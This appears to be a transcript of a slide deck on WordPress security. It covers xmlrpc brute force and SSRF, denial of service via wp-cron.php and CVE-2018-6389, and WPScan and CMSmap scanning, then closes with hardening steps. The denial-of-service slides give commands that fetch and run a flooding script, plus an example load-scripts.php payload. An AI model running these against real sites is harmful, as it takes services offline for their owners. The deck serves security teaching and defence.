Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Wordpress Security

Tuhin Bose
December 03, 2021

Wordpress Security

Tuhin Bose

December 03, 2021
Tweet

More Decks by Tuhin Bose

Other Decks in Technology

Transcript

  1. Conclusion & QNA Conclusion & QNA What is Wordpress? What

    is Wordpress? Why Wordpress? Why Wordpress? Hacking Wordpress Hacking Wordpress AGENDA Security Measures Security Measures
  2. Free and Open Source CMS Use to create a beautiful

    website Written in PHP and paired with a MySQL or MariaDB database. Simple, Flexible, User Management, Easy to setup and upgrade
  3. As of 2021, there are about 1.3 billion total websites

    on the web. More than 455 million sites use WordPress. Bunch of themes and plugins. Lack of awareness. Vulnerable by default. 1. 2. 3. 4.
  4. Default Credentials Administrator Editor: Publish and manages his and others

    posts. Author: Publish and manage his own posts. Contributor: Write and manage his posts but cannot publish them. Subscriber: Browse posts and edit their profile. User Permissions: 1. 2. 3. 4. 5.
  5. xmlrpc.php Location: /xmlrpc.php XML-RPC is a feature of WordPress that

    enables data to be transmitted, with HTTP acting as the transport mechanism and XML as the encoding mechanism. Let's say you want to post to your website from your mobile device. You could use the remote access feature enabled by xmlrpc.php to do just that. We'll try to achieve SSRF and Bruteforce.
  6. Denial of Service (DoS) /wp-cron.php When this file is accessed,

    a heavy MySQL query is performed, so it could be used by attackers to cause a DoS. By default, the wp-cron.php is called on every page load (anytime a client requests any Wordpress page), which on high-traffic sites can cause problems (DoS).
  7. Denial of Service (DoS) /wp-cron.php Detection: Blank page with 200

    OK response. Exploitation: Open your terminal and enter the following command: i. wget https://raw.githubusercontent.com/Quitten/doser.py/master/doser.py ii. python3 doser.py -t 999 -g 'https://target.com/wp-cron.php'
  8. Denial of Service (DoS) /wp-cron.php Detection: Blank page with 200

    OK response. Exploitation: Open your terminal and enter the following command: i. wget https://raw.githubusercontent.com/Quitten/doser.py/master/doser.py ii. python3 doser.py -t 999 -g 'https://target.com/wp-cron.php'
  9. Denial of Service (DoS) CVE-2018-6389 WordPress allows users to load

    multiple JS files and CSS files through load-scripts.php files at once. For example, https://example.com/wp-admin/load-scripts.php?c=1&load%5B%5D=jquery- ui-core,editor&ver=4.9.1, file load-scripts.php will load jquery-ui-core and editor files automatically and return the contents of the file. However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks. For example, if you use the below payload then it'll cause 4.11 Mb of data to be transferred b/w the server and the user. So if the attacker sends 10,000 requests then it would result in transferring 41100 Mb (42Gb) from the server to the user which would cause a Denial of Service attack to the server.
  10. Automation WPScan/CMSmap CMSmap: CMSmap is a Python open source CMS

    scanner that automates the method of detecting security flaws of the foremost popular CMSs. The main purpose of this tool is to integrate common vulnerabilities for different types of CMSs into a single tool. cmsmap https://example.com
  11. Automation WPScan/CMSmap WPScan: WPScan is a WordPress security scanner written

    for security professionals and blog maintainers to test the security of their WordPress websites.
  12. Automation Basic Scan: wpscan --url https://target.com/ Detect All Themes: wpscan

    --url https://target.com/ -e at Detect All Plugins: wpscan --url https://target.com/ -e ap Detect Vulnerable Themes: wpscan --url https://target.com/ -e vt --api-token <API> Detect Vulnerable Plugins: wpscan --url https://target.com/ -e vp --api-token <API>
  13. Disable xmlrpc manually or using some plugin. Disable wp-cron by

    updating wp-config.php: define('DISABLE_WP_CRON', true); Protect from CVE-2018-6389 by modifying .htaccess: 1. 2. and configure a regular system cronjob. 1. <Files load-scripts.php> Order allow, deny Deny from all </Files> 4. Update wordpress core, themes and plugins time to time. 5. Hide the detault login page/allow from few ip addresses. 6. Use reCAPTCHA on sensitive actions. 7. Always take a backup of your site. 8. Use a strong password and enable 2fa on every accounts. Security Measures